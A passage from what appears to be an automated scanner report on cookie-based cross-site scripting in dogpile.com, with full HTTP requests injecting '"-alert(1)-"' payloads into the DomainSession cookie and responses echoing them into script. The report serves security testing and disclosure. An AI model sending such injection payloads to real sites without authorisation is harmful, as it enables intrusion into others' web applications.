Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:42 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=943c5c3ef0f147488180c16a3af0cb01&ActionId=576fec2bf7284bfebe21c16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=2b6d828d4bd64cce96eac16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:55 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:55 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=2b6d828d4bd64cce96eac16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe; expires=Fri, 01 Apr 2011 17:34:55 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.136. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91bc"-alert(1)-"8a6ce0e863e was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:43 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=57e9f6a7a2d64328b77bc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=57e9f6a7a2d64328b77bc16a3af0cb01&ActionId=a3af644f37f54f13b92dc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:54 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:53 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 32540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=57e9f6a7a2d64328b77bc16a3af0cb01&ActionId=a3af644f37f54f13b92dc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e; expires=Fri, 01 Apr 2011 17:34:54 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.137. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24062"-alert(1)-"3197989eac9 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=cbef8ee057aa45668e6fc16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 17:14:46 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=69e4663f27db43c59583c16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:46 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:46 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 51063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=69e4663f27db43c59583c16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9; expires=Fri, 01 Apr 2011 17:34:46 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.138. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 868e6"-alert(1)-"815bb4494be was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=60447a2b02554a509018c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:01 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:01 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:01 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301677098680; path=/
Set-Cookie: wsRecent=site%3axss.cx,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:01 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 65245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=60447a2b02554a509018c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be; expires=Fri, 01 Apr 2011 17:18:01 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.139. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17e70"-alert(1)-"8009d3e9d2 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=03e0e226b781481fa972c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=d011953374bb4c588ac4c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:42 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:42 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:41 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=d011953374bb4c588ac4c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2; expires=Fri, 01 Apr 2011 17:35:42 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.140. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5784a"-alert(1)-"4be09a1635c was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:52 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678093005; wsRecent=site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=088007e032a74715904bc16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:34 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:34 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:34 GMT; path=/
Set-Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678152859; path=/
Set-Cookie: wsRecent=Review+Sites,Web,Relevance,&Submit+Site,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:34 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=088007e032a74715904bc16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c; expires=Fri, 01 Apr 2011 17:35:34 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.141. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35970"-alert(1)-"f277aa05b72 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:16 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=99bbb00780eb47fda590c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:31 GMT; path=/
Set-Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301678144640; path=/
Set-Cookie: wsRecent=Submit+Site,Web,Relevance,&Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:31 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=99bbb00780eb47fda590c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72; expires=Fri, 01 Apr 2011 17:35:31 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.142. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

